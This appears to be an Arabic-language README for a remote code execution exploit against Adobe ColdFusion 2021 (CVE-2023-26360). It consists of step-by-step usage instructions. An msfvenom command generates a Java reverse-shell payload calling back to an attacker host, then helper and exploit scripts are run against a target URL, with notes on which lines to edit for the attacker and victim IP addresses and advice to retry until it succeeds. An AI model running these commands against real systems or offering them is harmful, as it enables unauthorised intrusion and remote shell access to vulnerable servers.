
استغلال لتنفيذ التعليمات البرمجية عن بُعد في ColdFusion 2021 (CVE-2023-26360)
في بعض الأحيان، لا تعمل السكربتات من المحاولة الأولى. جرّب عدة مرات حتى تنجح
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.pycve.2023-26360.py، لذا يجب تشغيله أولاً.python3 server.py 8000
الوسيط 8000 هو المنفذ الذي سيستمع عليه الخادم.
من المهم ملاحظة أن السطر 12 يضبط عنوان IP الخاص بالخادم، لذا قم بتغييره:
s.bind(('192.168.56.1',port))
cve-2023-26360.pypython3 cve-2023-26360.py 8000
كما في server.py، الوسيط 8000 هو المنفذ الذي سيستمع عليه server.py. لذا يجب أن يكون نفسه في كلا الأمرين.
يحدد السطر 8 في cve-2023-26360.py عنوان IP الذي سيستمع عليه server.py. من الضروري تكوينه بشكل صحيح.
يحدد السطر 11 في cve-2023-26360.py عنوان IP الخاص بخادم coldfusion، لذا قم بتغييره:
url = "http://192.168.56.102:8500"